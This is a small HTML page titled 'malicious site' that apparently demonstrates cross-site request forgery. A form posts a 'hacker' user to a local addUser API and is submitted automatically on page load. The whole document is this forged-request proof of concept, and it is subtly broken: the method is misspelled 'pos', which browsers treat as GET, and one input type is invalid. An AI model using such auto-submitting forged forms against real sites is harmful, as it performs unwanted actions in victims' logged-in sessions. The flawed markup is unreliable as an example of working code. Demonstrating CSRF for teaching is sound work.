<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>恶意站点</title>
</head>

<body>
    <!-- 伪造获取添加用户 -->
    <form id="from" action="http://localhost:3000/api/addUser" method="pos">
        <input type="text" name="name" value="黑客">
        <input type="sex" name="sex" value="0">
    </form>

    <script>
        document.getElementById('from').submit()
    </script>
</body>

</html>